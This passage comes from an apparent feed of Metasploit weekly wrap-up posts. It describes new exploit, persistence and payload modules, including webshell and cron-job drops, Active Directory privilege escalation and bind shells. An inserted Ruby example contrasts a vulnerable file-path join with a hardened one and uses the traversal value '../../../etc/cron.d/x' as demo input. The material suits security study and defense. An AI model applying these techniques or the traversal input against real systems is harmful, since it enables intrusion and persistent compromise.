allows an unauthenticated user to upload a file to any location on the system via path traversal in the guid variable. 
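</p><p>The guid is the only thing standing between the request and the filesystem here, which is the general shape of a traversal bug: a request-controlled value becomes a path component without being confined to a base directory. The Ruby below is an added example, not SmarterTools' code and not the module's: it places the unchecked pattern beside a hardened version that validates the guid's shape, rejects filenames carrying separators, and confirms the canonicalised path still sits under the upload root. The upload root, the directory layout and the GUID format are assumptions made for the example.</p>

```ruby
require 'pathname'

# Added example, not SmarterTools' or Metasploit's code. The upload root, the
# "<root>/<guid>/<filename>" layout and the GUID format are assumptions made
# here to illustrate the class of bug, not SmarterMail's real implementation.
UPLOAD_ROOT = '/srv/app/uploads'.freeze
GUID_RE = /\A\h{8}-\h{4}-\h{4}-\h{4}-\h{12}\z/

# Vulnerable pattern: a request-controlled guid is spliced into the path
# unchecked, so a guid of "../../../etc/cron.d/x" walks out of UPLOAD_ROOT.
def upload_path_vulnerable(guid, filename)
  File.join(UPLOAD_ROOT, guid, filename)
end

# Where the write would actually land: expand_path collapses the ".." segments
# lexically, which is exactly what the traversal relies on.
def escapes_root?(path)
  !File.expand_path(path).start_with?("#{UPLOAD_ROOT}/")
end

# Hardened pattern. Returns the confined path, or nil when the request must be
# rejected. Three independent checks: the guid must match the expected shape,
# the filename must be a bare name, and the canonicalised result must still
# sit under UPLOAD_ROOT.
def upload_path_hardened(guid,
                         filename)
  return nil unless guid.match?(GUID_RE)
  return nil if filename.empty? || filename.start_with?('.') ||
                filename.include?('/') || filename.include?('\\')
  root = Pathname.new(UPLOAD_ROOT)
  candidate = (root + guid + filename).cleanpath
  return nil unless candidate.to_s.start_with?("#{root}/")
  candidate.to_s
end

if __FILE__ == $PROGRAM_NAME
  evil = upload_path_vulnerable('../../../etc/cron.d/x', 'job')
  puts "vulnerable: #{evil} -> #{File.expand_path(evil)} (escapes root? #{escapes_root?(evil)})"
  p upload_path_hardened('3f2504e0-4f89-11d3-9a0c-0305e82c3301', 'report.pdf')
  p upload_path_hardened('../../../etc/cron.d/x', 'job')
end
```

<p>Pathname#cleanpath and File.expand_path are lexical, so the confinement check defeats ".." segments but not a symlink already planted inside the root; once the target exists, File.realpath (or opening with O_NOFOLLOW) covers that case.</p><p>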
The module will either drop a webshell in the webroot directory (if the target is Windows) or create a cron job by dropping a file in /etc/cron.d (if the target is Linux).</p><h3>Burp Extension Persistence</h3><p>Author: h00die Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/19821">#19821</a> contributed by <a href="https://github.com/h00die">h00die</a> Path: multi/persistence/burp_extension</p><p>Description: This adds a new persistence module for BurpSuite. The module adds a malicious extension to both the Pro and Community versions, which is triggered when the user starts BurpSuite.</p><h3>SSH Key Persistence</h3><p>Authors: Dean Welch <a href="mailto:dean_welch@rapid7.com">dean_welch@rapid7.com</a> and h00die <a href="mailto:mike@shorebreaksecurity.com">mike@shorebreaksecurity.com</a> Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20778">#20778</a> contributed by <a href="https://github.com/h00die">h00die</a> Path: multi/persistence/ssh_key</p><p>Description: Combines the Windows and Linux ssh key persistence modules.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20778">#20778</a> from <a href="https://github.com/h00die">h00die</a> - Combines the Windows and Linux ssh key persistence modules.</li></ul><h2>Bugs fixed (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20897">#20897</a> from <a href="https://github.com/h00die">h00die</a> - This fixes a bug that was preventing collected hash data from being formatted as input for the John the Ripper cracker. 
The result is that users can now once again crack passwords using John.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20902">#20902</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This fixes a bug in the auxiliary/scanner/ssh/ssh_login module that would incorrectly state that a login failed when it in fact succeeded but the module was unable to open a session. This was only an issue when the CreateSession option is true.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20909">#20909</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug in Metasploit Pro that reported false positives for HTTP bruteforcing.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-22T00%3A20%3A35Z..2026-01-29T15%3A38%3A16Z%22">Pull Requests 6.4.110...6.4.111</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.110...6.4.111">Full diff 6.4.110...6.4.111</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026</link>
      <guid isPermaLink="false">bltb151cf70e841bfb3</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Spencer McIntyre]]></dc:creator>
      <pubDate>Fri, 30 Jan 2026 21:11:27 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 01/23/2026]]></title>
      <description><![CDATA[<h2>Oracle E-Business Suite Unauth RCE</h2><p>This week, we are pleased to announce the addition of a module that exploits CVE-2025-61882, a pre-authentication remote code execution vulnerability in Oracle E-Business Suite versions 12.2.3 through 12.2.14. The exploit chains multiple flaws—including SSRF, path traversal, HTTP request smuggling, and XSLT injection—to coerce the target into fetching and executing a malicious XSL file hosted by the attacker. Successful exploitation results in arbitrary command execution and an interactive shell on both Linux/Unix and Windows targets. The module is reliable and repeatable, and we here at Metasploit hope you enjoy it. Happy hacking!</p><h2>New module content (3)</h2><h3>Authenticated RCE in Splunk (splunk_archiver app)</h3><p>Authors: Alex Hordijk, Maksim Rogov, and psytester</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20770">#20770</a> contributed by <a href="https://github.com/vognik">vognik</a></p><p>Path: linux/http/splunk_auth_rce_cve_2024_36985</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-36985&amp;referrer=blog">CVE-2024-36985</a></p><p>Description: This adds two separate Metasploit exploit modules targeting Remote Code Execution (RCE) vulnerabilities in Splunk Enterprise. CVE-2024-36985 exploits unsafe use of the "copybuckets" lookup function within the splunk_archiver application, resulting in execution of the sudobash helper script with attacker-controlled arguments. Affected versions: all releases prior to 9.0.10, 9.1.2 through 9.1.5, and 9.2.0 through 9.2.2. CVE-2022-43571 exploits a Python code injection vulnerability in Splunk SimpleXML dashboards by injecting malicious code into sparkline style parameters. Malicious code is executed when a user exports the dashboard to PDF. Affected versions: all releases prior to 8.1.12, 8.2.0 through 8.2.9, and 9.0.0 through 9.0.2.</p><h3>Oracle E-Business Suite CVE-2025-61882 RCE</h3><p>Authors: Mathieu Dupas and watchTowr (Sonny, Sina Kheirkhah, Jake Knott)</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20750">#20750</a> contributed by <a href="https://github.com/MatDupas">MatDupas</a></p><p>Path: multi/http/oracle_ebs_cve_2025_61882_exploit_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61882&amp;referrer=blog">CVE-2025-61882</a></p><p>Description: This adds an exploit for CVE-2025-61882, a critical Remote Code Execution (RCE) vulnerability in Oracle E-Business Suite (EBS). The flaw allows unauthenticated attackers to execute arbitrary code by leveraging a combination of SSRF, HTTP request smuggling and XSLT injection. Affected versions: Oracle E-Business Suite 12.2.3-12.2.14.</p><h3>Authenticated RCE in Splunk (SimpleXML dashboard PDF generation)</h3><p>Authors: Danylo Dmytriiev, Maksim Rogov, and psytester</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20770">#20770</a> contributed by <a href="https://github.com/vognik">vognik</a></p><p>Path: multi/http/splunk_auth_rce_cve_2022_43571</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2022-43571&amp;referrer=blog">CVE-2022-43571</a></p><p>Description: This adds two separate Metasploit exploit modules targeting Remote Code Execution (RCE) vulnerabilities in Splunk Enterprise. CVE-2024-36985 exploits unsafe use of the "copybuckets" lookup function within the splunk_archiver application, resulting in execution of the sudobash helper script with attacker-controlled arguments. Affected versions: all releases prior to 9.0.10, 9.1.2 through 9.1.5, and 9.2.0 through 9.2.2. CVE-2022-43571 exploits a Python code injection vulnerability in Splunk SimpleXML dashboards by injecting malicious code into sparkline style parameters. Malicious code is executed when a user exports the dashboard to PDF. Affected versions: all releases prior to 8.1.12, 8.2.0 through 8.2.9, and 9.0.0 through 9.0.2.</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20755">#20755</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds an advanced datastore option, KrbClockSkew, to modules that use Kerberos authentication, allowing operators to adjust the Kerberos clock from the Metasploit side to fix clock skew errors.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20840">#20840</a> from <a href="https://github.com/xaitax">xaitax</a> - This updates the MongoBleed auxiliary module and adds new options. The module can now use the Wiz Magic Packet to detect the vulnerability quickly; it can detect compression libraries used by MongoDB (and warns or stops the user if zlib is not enabled). The module can also reuse the MongoDB socket connection during memory scanning, which significantly improves performance. Finally, it can better leak secrets, either by pattern matching or by storing the extracted information in raw or JSON format.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20861">#20861</a> from <a href="https://github.com/bcoles">bcoles</a> - Adds multiple improvements to get_hostname resolution logic for post exploitation modules.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20888">#20888</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - Fixes an issue that caused dMSA Kerberos authentication to fail.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-16T22%3A44%3A19Z..2026-01-22T00%3A20%3A35Z%22">Pull Requests 6.4.108...6.4.110</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.108...6.4.110">Full diff 6.4.108...6.4.110</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-23-2026</link>
      <guid isPermaLink="false">blt78261fa56d64f0a3</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Jack Heysel]]></dc:creator>
      <pubDate>Fri, 23 Jan 2026 21:00:28 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0d50271a40a5f14f/6849ab419621d9f3824d5017/metasploit-sky.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 01/16/2026]]></title>
      <description><![CDATA[<h2>Persistence, dMSA Abuse & RCE Goodies</h2><p>This week, we have received a lot of contributions from the community, such as <a href="https://github.com/h00die">h00die</a>, <a href="https://github.com/Chocapikk">Chocapikk</a> and countless others, which is greatly appreciated. This week’s modules and improvements in Metasploit Framework range from new modules, such as dMSA Abuse (resulting in escalation of privilege in Windows Active Directory environments), authenticated and unauthenticated RCE modules, as well as many improvements and additions to the persistence modules and techniques.</p><h2>New module content (13)</h2><h3>BadSuccessor: dMSA abuse to Escalate Privileges in Windows Active Directory</h3><p>Authors: AngelBoy, Spencer McIntyre, and jheysel-r7 </p><p>Type: Auxiliary </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20472">#20472</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a> </p><p>Path: <span data-type='inlineCode'>admin/ldap/bad_successor</span></p><p>Description: This adds an exploit for "BadSuccessor" which is a vulnerability whereby a user with permissions to an Organizational Unit (OU) in Active Directory can create a Delegated Managed Service Account (dMSA) account in such a way that it can lead to the issuance of a Kerberos ticket for an arbitrary user.</p><h3>Control Web Panel /admin/index.php Unauthenticated RCE</h3><p>Authors: Egidio Romano and Lukas Johannes Möller </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20806">#20806</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a> </p><p>Path: <span data-type='inlineCode'>linux/http/control_web_panel_api_cmd_exec</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-67888&amp;referrer=blog">CVE-2025-67888</a></p><p>Description: This adds a new module for Control Web Panel (CVE-2025-67888). 
The vulnerability is unauthenticated OS command injection through an exposed API. The module requires Softaculous to be installed.</p><h3>Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload</h3><p>Author: Alexandru Ionut Raducu </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20811">#20811</a> contributed by <a href="https://github.com/Xorriath">Xorriath</a> </p><p>Path: <span data-type='inlineCode'>linux/http/prison_management_rce</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-48594&amp;referrer=blog">CVE-2024-48594</a></p><p>Description: This adds a new module for Prison Management System 1.0 (CVE-2024-48594). The module requires admin credentials, which are subsequently used to exploit an unrestricted file upload to upload a webshell.</p><h3>udev Persistence</h3><p>Author: Julien Voisin </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20796">#20796</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type='inlineCode'>linux/persistence/udev</span></p><p>Description: This moves the udev persistence module into the persistence category and adds the persistence mixin.</p><h3>n8n Workflow Expression Remote Code Execution</h3><p>Author: Lukas Johannes Möller </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20810">#20810</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a> </p><p>Path: <span data-type='inlineCode'>multi/http/n8n_workflow_expression_rce</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-68613&amp;referrer=blog">CVE-2025-68613</a></p><p>Description: This adds a new module for n8n (CVE-2025-68613). The vulnerability is authenticated remote code execution in the workflow expression evaluation engine. 
The module requires credentials to create a malicious workflow that executes system commands via a JavaScript payload.</p><h3>Web-Check Screenshot API Command Injection RCE</h3><p>Author: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20791">#20791</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type='inlineCode'>multi/http/web_check_screenshot_rce</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-32778&amp;referrer=blog">CVE-2025-32778</a></p><p>Description: Adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint which allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.</p><h3>Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key</h3><p>Authors: OJ Reeves and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20751">#20751</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type='inlineCode'>windows/persistence/accessibility_features_debugger</span></p><p>Description: This updates the Windows sticky keys post persistence module to use the new persistence mixin.</p><h3>WMI Event Subscription Event Log Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type='inlineCode'>windows/persistence/wmi/wmi_event_subscription_event_log</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. 
The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Interval Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type='inlineCode'>windows/persistence/wmi/wmi_event_subscription_interval</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Process Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type='inlineCode'>windows/persistence/wmi/wmi_event_subscription_process</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Logon Timer Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type='inlineCode'>windows/persistence/wmi/wmi_event_subscription_uptime</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. 
The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>Linux Chmod</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20845">#20845</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: <span data-type='inlineCode'>linux/armle/chmod</span> and <span data-type='inlineCode'>linux/aarch64/chmod</span></p><p>Description: Adds Linux ARM 32-bit / 64-bit Little Endian chmod payloads.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> from <a href="https://github.com/h00die">h00die</a> - Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20751">#20751</a> from <a href="https://github.com/h00die">h00die</a> - This updates the Windows sticky keys post persistence module to use the new persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20785">#20785</a> from <a href="https://github.com/Chocapikk">Chocapikk</a> - This adds Waku framework support to the existing react2shell module. Waku is a minimal React framework which differs slightly compared to Node.js. The module maintains backward compatibility with existing Next.js targets while adding Waku support through a modular framework configuration system.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20786">#20786</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This updates the module code to merge the target Arch and Platform entries into the module's top level data. 
Prior to this change, module developers had to define Arch and Platform entries twice, once at the module level and again per individual target. This updates over 500 modules and removes that duplication.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20796">#20796</a> from <a href="https://github.com/h00die">h00die</a> - This moves the udev persistence module into the persistence category and adds the persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20853">#20853</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Bumps metasploit-payloads to 2.0.239.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20855">#20855</a> from <a href="https://github.com/h00die">h00die</a> - Adds additional ATT&CK references to persistence modules.</li></ul><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20738">#20738</a> from <a href="https://github.com/Shubham0699">Shubham0699</a> - This fixes an issue in the bailiwicked DNS modules that was causing the module to fail with a stack trace due to a programming error.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20847">#20847</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - This updates the auxiliary/scanner/ssh/ssh_login module to remove stale documentation, remove unnecessary characters that were printed in the output, and update the documentation with the new information about key usage.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20665">#20665</a> from <a href="https://github.com/basicallyabidoof">basicallyabidoof</a> - Adds documentation for the ipv6_neighbor_router_advertisement module.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-07T06%3A36%3A30-05%3A00..2026-01-14T22%3A53%3A30Z%22">Pull Requests 6.4.106...6.4.107</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.106...6.4.107">Full diff 6.4.106...6.4.107</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-16-2026</link>
      <guid isPermaLink="false">bltb32ab5ee97c5e59d</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Simon Janusz]]></dc:creator>
      <pubDate>Fri, 16 Jan 2026 18:49:01 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7464fe659cab8a01/6852c358419e54d8e21c3458/blog-metasploit-wrap-up-.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 01/09/2026]]></title>
      <description><![CDATA[<h2>RISC-V Payloads</h2><p>This week brings more RISC-V payloads from community member <a href="https://github.com/bcoles">bcoles</a>. One provides a new adapter which allows RISC-V payloads to be converted to commands and delivered as a Metasploit fetch-payload. The second is a classic bind shell, offering the user interactive connectivity to the target host. Both of these go a long way in improving Metasploit’s support for RISC-V systems.</p><h2>Annual Wrap Up</h2><p>With a new year comes a new annual wrap up. Earlier this week, the Metasploit project <a href="https://www.rapid7.com/blog/post/pt-metasploit-2025-annual-wrap-up/">posted the annual wrap up</a> covering notable changes from 2025.</p><h2>New module content (4)</h2><h3>Taiga tribe_gig authenticated unserialize remote code execution</h3><p>Authors: rootjog and whotwagner </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20700">#20700</a> contributed by <a href="https://github.com/whotwagner">whotwagner</a> </p><p>Path: <span data-type='inlineCode'>multi/http/taiga_tribe_gig_unserial</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-62368&amp;referrer=blog">CVE-2025-62368</a></p><p>Description: This adds a new module for an authenticated deserialization vulnerability in Taiga.io (CVE-2025-62368). The module sends malicious data to an exposed API, which performs unsafe deserialization, leading to remote code execution.</p><h3>Python Site-Specific Hook Persistence</h3><p>Author: msutovsky-r7 </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20692">#20692</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> </p><p>Path: <span data-type='inlineCode'>multi/persistence/python_site_specific_hook</span></p><p>Description: This adds a persistence module which leverages Python's startup mechanism, where some files are automatically processed during the initialization of the Python interpreter. Some of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism if an attacker has established access to the target machine with sufficient permissions.</p><h3>Add Linux RISC-V command payload adapters</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> </p><p>Type: Payload (Adapter) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20734">#20734</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Description: This extends fetch payloads for RISC-V targets.</p><h3>Linux Command Shell, Bind TCP Inline</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20733">#20733</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: <span data-type='inlineCode'>linux/riscv32le/shell_bind_tcp</span></p><p>Description: This adds a new payload: a bind shell for Linux RISC-V targets.</p><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20370">#20370</a> from <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> - Fixes an issue that occurred when negotiating the SMB version and the server uses an unknown dialect. Now, the login function will throw an exception and exit gracefully.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20744">#20744</a> from <a href="https://github.com/ptrstr">ptrstr</a> - This fixes a bug in unix/webapp/wp_reflexgallery_file_upload where the current year and month were being hardcoded in the request. This caused the server to reject the exploit if there was no folder in wp-content/uploads for that specific year and month. Now the year and month are configurable datastore options.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20831">#20831</a> from <a href="https://github.com/DataExplorerX">DataExplorerX</a> - This adds a link to issues in the Metasploit Framework GitHub repository.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-12-30T13%3A59%3A48Z..2026-01-07T06%3A36%3A30-05%3A00%22">Pull Requests 6.4.105...6.4.106</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.105...6.4.106">Full diff 6.4.105...6.4.106</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-09-2026</link>
      <guid isPermaLink="false">bltbe45e2d2f14071e0</guid>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category>
      <category><![CDATA[Metasploit]]></category><dc:creator><![CDATA[Spencer McIntyre]]></dc:creator>
      <pubDate>Fri, 09 Jan 2026 23:07:48 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit 2025 Annual Wrap-Up]]></title>
      <description><![CDATA[<p>Hard to believe it's that time again, and that Metasploit Framework will see the dawn of another Annual Wrap-Up (and a New Year). All of the metrics and modules you see here would in large part not be possible without the dedicated community members who care about the Framework and its mission on all the days of the year. It is their hard work and dedication that makes it look like magic, and sometimes, it feels like it too. A heartfelt thank you to all of our researchers and contributors, you're what makes Metasploit Framework so resilient.</p><p>This year brought its share of notable vulnerabilities, substantial framework improvements, and continued evolution of the project. Whether you submitted a module, filed an issue, or helped triage a bug, your contributions have kept Metasploit relevant and powerful. So without further ado, let's dive into the highlights from 2025.</p><h2>Persistence Overhaul</h2><p>One of the year's significant infrastructure improvements came from community contributor h00die, who spearheaded a massive refactor of Metasploit's persistence modules. The project, tracked in issue <a href="https://github.com/rapid7/metasploit-framework/issues/20374">#20374</a>, involved reorganizing dozens of persistence modules from their scattered locations across the framework into a dedicated persistence directory under exploits. This wasn't just housekeeping—h00die created a standardized persistence mixin that brought consistency to how modules handle installation, cleanup, and option handling. The refactor touched over 30 modules spanning Linux, Windows, OSX, and multi-platform techniques, modernizing each one with proper check methods, MITRE ATT&CK references, and standardized options like WritableDir. 
The work also laid the groundwork for a persistence suggester module that can automatically recommend viable persistence techniques based on session characteristics.</p><p>The sheer scope of this effort can't be overstated. Breaking the work into manageable chunks, h00die systematically converted modules from the old post-exploitation style to proper exploit modules with the new persistence mixin, handling everything from cron jobs and SSH keys to Windows registry modifications and service installations. The standardization means that all persistence modules now share common behaviors, produce cleanup scripts in a consistent format, and integrate cleanly with the rest of the framework. It's the kind of unglamorous but essential work that improves the entire framework's usability and maintainability, and we're grateful to h00die for taking on such an ambitious project and seeing it through.</p><h2>AD CS Vulnerable Certificate Template Detection and Exploitation Additions</h2><p>This year, Metasploit expanded its Active Directory Certificate Services (AD CS) coverage by adding detection and exploitation support for certificate templates vulnerable to ESC9, ESC10, and 